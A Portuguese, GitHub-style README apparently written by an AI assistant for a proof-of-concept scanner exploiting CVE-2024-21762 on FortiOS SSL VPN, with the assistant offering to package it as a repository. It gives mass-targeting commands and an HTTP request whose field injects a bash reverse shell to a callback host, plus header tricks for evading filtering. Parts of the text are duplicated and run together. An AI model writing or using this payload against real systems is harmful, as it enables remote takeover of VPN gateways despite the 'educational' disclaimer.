
Scanner de prova de conceito visando CVE-2024-21762 no endpoint /remote/hostcheck_validate do FortiOS SSL VPN com entrega de payload de reverse shell.
Scanner de prova de conceito visando o CVE-2024-21762 no endpoint /remote/hostcheck_validate do SSL VPN do FortiOS com entrega de payload de shell reverso.
Aqui está uma descrição no estilo GitHub para o seu projeto, incluindo um resumo limpo e conciso, um guia de uso e contexto sobre como ele se encaixa no CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerScanner de prova de conceito visando o CVE-2024-21762 no endpoint
/remote/hostcheck_validatedo SSL VPN do FortiOS com entrega de payload de shell reverso.
Este script Python é uma ferramenta de PoC (Prova de Conceito) projetada para interagir com a interface SSL VPN do FortiOS da Fortinet, visando a — uma vulnerabilidade de estouro de buffer baseado em pilha ou injeção de comandos no endpoint .
/remote/hostcheck_validateAviso: Isso é apenas para fins educacionais e testes autorizados.
/remote/hostcheck_validate em uma interface SSL VPN do FortiGate.host).User-Agent, Cookie) para burlar a filtragem superficial de requisições do FortiOS.last_response.txt)tqdm para visualização de progressoInstale as dependências:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip SEU_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip SEU_IP --callback-port 8080
targets.txt: Lista de alvos no formato IP:PORT, um por linharesults.txt: Log de saída das tentativas de exploraçãoPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
A ferramenta escreve a resposta HTTP completa de cada tentativa em:
last_response.txt
Use isso para verificar se a requisição foi analisada, rejeitada ou se um código de erro foi retornado.
Este código é fornecido apenas para fins educacionais e testes autorizados. Não utilize em redes ou sistemas que você não possui ou para os quais não tem permissão explícita para testar.
Carter — Engenheiro de Cibersegurança, entusiasta de Red/Purple Team, nerd em automação de PoCs.
Gostaria que isso fosse empacotado em um arquivo README.md + estrutura de repositório pronta para enviar ao GitHub? Posso gerar isso em seguida.